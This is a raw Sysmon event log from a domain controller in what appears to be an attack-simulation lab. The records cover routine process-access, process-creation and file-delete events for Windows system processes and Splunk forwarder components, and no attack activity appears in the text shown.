12:04:03.049{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.049{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:03.050{266CAFBE-6533-6064-1D01-00000000AE01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.812{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.813{266CAFBE-6534-6064-1F01-00000000AE01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.656{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC3C922BF75973D923ED6EB1108F1A3,SHA256=392E1C5E8159919B8C81FF3B27FCA21390695ECE2A31D6753A1F8283E70F606A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.157{266CAFBE-6534-6064-1E01-00000000AE01}67084864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.000{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:04.001{266CAFBE-6534-6064-1E01-00000000AE01}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:05.670{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A04CD1797E4E0CAA371BA664B736E8,SHA256=CBCB1632B9882066151C8ACAB5E8367CE74DA3A2C497AC4A4E997B650BBC5394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.684{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0406733BF3F5F569A2183C0496CC361B,SHA256=D4B62C29C9C975D6F20330C281B1F4B3F2EF069A1F16527787C78849B69C5D55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.591{266CAFBE-6536-6064-2001-00000000AE01}44486804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:06.435{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6536-6064-2001-00000000AE01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009011Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 